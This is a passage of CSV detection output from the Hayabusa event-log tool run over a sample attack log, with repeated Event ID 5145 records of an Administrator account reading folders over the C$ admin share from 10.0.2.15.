Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.957 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\Public\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.957 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.957 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.967 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.967 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.967 
+00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.967 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.967 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.967 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$ | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 
+00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.987 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.987 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.987 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.987 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.987 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.987 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.997 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.007 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.007 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 14:23:24.007 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.007 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.007 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.007 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.007 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.017 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.017 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.017 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.017 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.017 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.017 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.017 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.027 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.027 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.027 
+00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.027 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.027 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.027 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.027 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.027 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.037 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.037 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.037 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.047 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.047 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.047 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 